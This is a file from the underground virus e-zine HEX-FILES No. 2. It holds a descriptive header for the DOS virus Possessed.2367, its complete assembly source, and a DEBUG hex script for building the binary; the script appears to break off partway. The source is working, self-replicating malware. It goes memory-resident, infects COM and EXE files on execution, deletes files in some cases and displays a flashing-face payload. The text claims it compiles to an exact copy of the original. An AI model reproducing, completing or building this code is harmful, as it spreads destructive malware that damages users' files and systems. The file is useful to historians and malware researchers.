Copy Link
Add to Bookmark
Report
Hexfiles Issue 2 File 005
HEX-FILES No. 2 File 005
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Virus: Possessed.2367
Alias: Possessed 1.03, Possessed II
Targets: COM, EXE
Resident: Low Memory TSR
MemorySize: 2864 bytes + environment
MemorySelfRec: [0:1EC] <> 0
VirusLength: 2367 bytes
InfectiveLength:
COM: 2367 bytes
EXE: 2367 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1051..Eof-1050] = 41h 4bh) and
(File[16..81] = Virus[8..73])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"
"COMMAND.COM"
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"
"COMMAND.COM",
DisplayedText:
If host program EXEC failed
"POSSESSED! Bwa! ha! ha! ha! ha!"
Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
3 hours from other programs
ÄÄ POS2367.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2367
; Alias: Possessed 1.03, Possessed II
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled
; in a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
ExeHeader struc
isExeId dw ?
isMod dw ?
isBlocks dw ?
isRelocItemCt dw ?
isHeaderSize dw ?
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?
isSp dw ?
isCxSum dw ?
isIp dw ?
isCs dw ?
ExeHeader ends
Possessed segment 'code'
assume cs:Possessed, ds:nothing
org 0
MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h
PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry
PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26
isDos:
jmp DosHandler
DosVersion db ?
FirstGenerationFlag db 1
DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ?
ErrorIntSegment dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?
DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ax
push bx
push dx
push ds
mov bx,dx
mov al,[bx]
push cs
pop ds
mov dx,offset CommandCom
mov bx,dx
mov [bx],al
call SaveRegistersBeforeInfect
pop ds
pop dx
pop bx
pop ax
call SaveRegistersBeforeInfect
jmp PassToDos
CommandCom db 'C:COMMAND.COM',0
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect
RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
PassToDos:
popf
jmp DosInterrupt
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb
assume cs:Possessed, ds:Possessed
push ds
push dx
push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos
assume cs:Possessed, ds:nothing
pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov FileDate,dx
mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,Handle
mov ax,4202h
call UseDos
jc Relay2
mov ComLength,ax
call MovePointerBegin
Relay2:
jc Relay3
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected
InfectCheckCom:
mov si,cx
sub si,(VirusStack-FaceData)
js Relay4
cmp word ptr [si],4b41h
je VerifyComInfection
Relay4:
jmp NotInfected
VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile
DoneWithFile:
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters
NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1
assume cs:Possessed, ds:Possessed
pop ds
mov ActivateLength,3
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay5:
jmp DoneWithFile
SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace
assume cs:Possessed, ds:nothing
CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2400
jnc EnoughDiskSpace
jmp DeleteFile
EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay5
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile
Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx
LocComEntry dw ?
LocEndOfFile dw ?
isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es
assume cs:Possessed, ds:Possessed
push cs
pop ds
mov dx,ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h) ;ffa3
mov LocComEntry,dx
jmp JumperSet
ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin
assume cs:Possessed, ds:nothing
pop ds
mov cx,ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay6:
jmp Relay5
WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay6
jmp DoneWithFile
DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile
PixelRow equ Environment+100h
PixelColumn equ Psp+100h
isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt
ShowTime:
popf
mov ax,6
int 10h
assume cs:Possessed, ds:Possessed
push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate
EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret
assume cs:Possessed, ds:nothing
isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay7
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos
assume cs:Possessed, ds:Possessed
push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,0
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay7:
jmp DoneWithFile
assume cs:Possessed, ds:nothing
isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret
UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret
MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret
MoveCursor:
mov ah,2
xor bx,bx
int 10h
ret
Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret
Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret
EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h
EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h
;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0
ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory
ExecuteExeVictim:
pop es
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h
SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf
assume cs:Possessed, ds:Possessed
SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,(FaceData-EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ExeEntry
add ax,(3521h-3306h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,16
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,16
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode
NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+3],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName
CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz
assume cs:Possessed, ds:nothing
FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted
OldDos:
int 21h
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h
NameofVictim db 13 dup (?)
ComEntry:
add si,100h
push es
xor ax,ax
mov es,ax
cmp word ptr es:MemoryMarkerLoc,0
je NotInMemory
pop es
sub si,5ah ;(ExeStack-SaveVictimCode)
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
mov bx,100h
clc
jmp bx
NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es
assume cs:Possessed, ds:Possessed
push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es
jmp cs:DosInterrupt+100h
SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)
Possessed ends
end PossessedEntry
ÄÄ POS2367.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄ POS2367.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N POS2367.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 63 0B 06 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74 6F
E 0160 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45 58
E 0170 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 0A 48
E 0180 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75 74
E 0190 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72 65
E 01A0 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65
E 01B0 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70
E 01C0 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69 6D 61
E 01D0 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 62 72
E 01E0 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 20 74
E 01F0 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 20 6F
E 0200 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69
E 0210 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A 70 65
E 0220 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65
E 0230 73 20 74 68 69 73 20 76 69 72 69 69 20 62 65 61
E 0240 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 73 69
E 0250 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73 2F 68
E 0260 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A 54 68
E 0270 69 73 20 76 69 72 69 69 20 69 73 20 73 74 72 69
E 0280 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61 74 69
E 0290 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65 73 65
E 02A0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02B0 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07 01 B4
E 02C0 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 03 07 0D
E 02D0 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21 20
E 02E0 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21 24
E 02F0 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E 4A
E 0300 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55 0A
E 0310 1A EB 37 90 06 00 4A 00 8C 0B 2E 03 8C 0B 82 04
E 0320 46 0C 08 04 35 05 20 00 05 00 23 22 68 24 C7 01
E 0330 EA 0C 5B 00 03 03 08 04 0A 06 00 00 00 00 00 00
E 0340 00 00 00 00 00 00 30 0C 36 0C 9C 3D 00 4B 75 40
E 0350 50 53 52 1E 8B DA 8A 07 0E 1F BA A7 00 8B DA 88
E 0360 07 E8 18 00 1F 5A 5B 58 E8 11 00 EB 23 90 43 3A
E 0370 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 1E 06 56 57
E 0380 50 53 51 52 EB 10 90 5A 59 5B 58 5F 5E 07 1F C3
E 0390 9D 2E FF 2E 4F 00 2E 8C 1E 5B 00 2E 89 16 5D 00
E 03A0 8B F2 83 C6 02 8B DE 80 3C 5C 75 06 8B DE 43 EB
E 03B0 06 90 80 3C 00 74 15 46 EB ED B8 24 25 2E 8B 16
E 03C0 57 00 2E 8E 1E 59 00 E8 92 03 EB BB 8B F3 0E 07
E 03D0 BF 8F 08 B9 0D 00 FC F3 A4 1E 52 06 1F B8 24 35
E 03E0 E8 79 03 8C 06 59 00 89 1E 57 00 B8 24 25 BA 82
E 03F0 04 E8 68 03 5A 1F B8 00 43 E8 60 03 72 BC 2E 89
E 0400 0E 5F 00 B8 01 43 B9 20 00 E8 50 03 72 EE B8 02
E 0410 3D E8 48 03 72 E6 2E A3 61 00 8B D8 B8 00 57 E8
E 0420 3A 03 2E 89 16 65 00 2E 89 0E 63 00 BB FE FF B4
E 0430 48 E8 28 03 73 07 B4 48 E8 21 03 72 BF 2E A3 69
E 0440 00 33 C9 8B D1 2E 8B 1E 61 00 B8 02 42 E8 0C 03
E 0450 72 07 2E A3 67 00 E8 1E 03 72 11 2E 8B 0E 67 00
E 0460 33 D2 2E 8E 1E 69 00 B4 3F E8 F0 02 72 36 0E 07
E 0470 33 F6 81 3C 4D 5A 75 0A 81 7C 12 70 19 74 25 EB
E 0480 5F 90 8B F1 81 EE 1B 04 78 06 81 3C 41 4B 74 03
E 0490 EB 4E 90 BE 10 00 BF 08 00 B9 21 00 FC F3 A7 74
E 04A0 03 E9 3F 01 2E 8E 06 69 00 B4 49 E8 AE 02 2E 8B
E 04B0 1E 61 00 2E 8B 16 65 00 2E 8B 0E 63 00 B8 01 57
E 04C0 E8 99 02 B4 3E E8 94 02 2E 8E 1E 5B 00 2E 8B 16
E 04D0 5D 00 2E 8B 0E 5F 00 B8 01 43 E8 7F 02 E9 A7 FE
E 04E0 06 2E 8E 1E 5B 00 2E 8B 36 5D 00 8A 14 80 EA 40
E 04F0 1F C6 06 6E 00 03 BE D7 04 B9 0B 00 B0 17 E8 88
E 0500 02 BF 8F 08 E8 8C 02 9C F6 D8 E8 7C 02 9D 72 11
E 0510 80 3E 4D 00 03 73 02 EB 8B C6 06 6E 00 0B EB 18
E 0520 90 B4 36 E8 36 02 33 D2 F7 E3 F7 E1 0B D2 75 08
E 0530 3D 60 09 73 03 E9 AB 00 2E 8B 1E 61 00 E8 37 02
E 0540 72 D5 2E 8E 1E 69 00 33 F6 81 3C 4D 5A 75 13 E9
E 0550 40 01 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 63 0B
E 0560 06 0B 1E 1E BF E5 08 B9 2D 00 FC F3 A5 07 0E 1F
E 0570 8B 16 67 00 80 3E 6E 00 0B 75 0F 89 16 99 02 81
E 0580 EA A3 FF 89 16 97 02 EB 13 90 52 81 C2 9C 09 89
E 0590 16 97 02 5A 81 C2 3F 09 89 16 99 02 BE 8B 02 33
E 05A0 FF B9 08 00 FC F3 A5 BE 08 00 B9 21 00 FC F3 A5
E 05B0 E8 C4 01 1F 2E 8B 0E 67 00 2E 80 3E 6E 00 0B 75
E 05C0 04 81 E9 3F 09 33 D2 B4 40 E8 90 01 73 03 E9 46
E 05D0 FF 0E 1F BA 00 00 B9 3F 09 B4 40 E8 7E 01 72 EE
E 05E0 E9 C1 FE 2E 8E 1E 5B 00 2E 8B 16 5D 00 B4 41 E8
E 05F0 6A 01 E9 AF FE 9C 2E FF 06 6B 00 75 07 2E FE 0E
E 0600 6D 00 74 06 9D 2E FF 2E 53 00 9D B8 06 00 CD 10
E 0610 0E 1F 33 DB 33 D2 BE 24 05 C7 06 7F 01 C8 00 C7
E 0620 06 81 01 00 00 E8 3E 00 C7 06 7F 01 C9 00 C7 06
E 0630 81 01 01 00 E8 2F 00 C7 06 7F 01 BD 00 C7 06 81
E 0640 01 FF FF E8 20 00 C7 06 7F 01 C9 00 C7 06 81 01
E 0650 FF FF E8 11 00 C7 06 7F 01 BD 00 C7 06 81 01 01
E 0660 00 E8 02 00 EB B0 56 B0 01 B9 02 00 51 56 8A 1C
E 0670 0A DB 74 16 8B CB 03 0E 7F 01 8A 54 01 03 16 81
E 0680 01 B4 0C CD 10 83 C6 02 EB E4 5E 32 C0 59 E2 DC
E 0690 5E C3 C7 44 12 70 19 8B 44 0E 05 10 00 2E A3 73
E 06A0 00 8B 44 10 2E A3 75 00 8B 44 14 2E A3 79 00 8B
E 06B0 44 16 05 10 00 2E A3 77 00 8B 44 04 83 7C 02 00
E 06C0 74 01 48 BB 00 02 F7 E3 03 44 02 83 D2 00 05 0F
E 06D0 00 83 D2 00 25 F0 FF 2E A3 7B 00 2E 89 16 7D 00
E 06E0 05 3F 09 83 D2 00 72 5E F7 F3 0B D2 74 01 40 89
E 06F0 44 04 89 54 02 2E A1 7B 00 2E 8B 16 7D 00 BB 10
E 0700 00 F7 F3 2B 44 08 2D 10 00 89 44 16 C7 44 14 C9
E 0710 07 89 44 0E C7 44 10 3F 0A 2E 8B 1E 61 00 E8 56
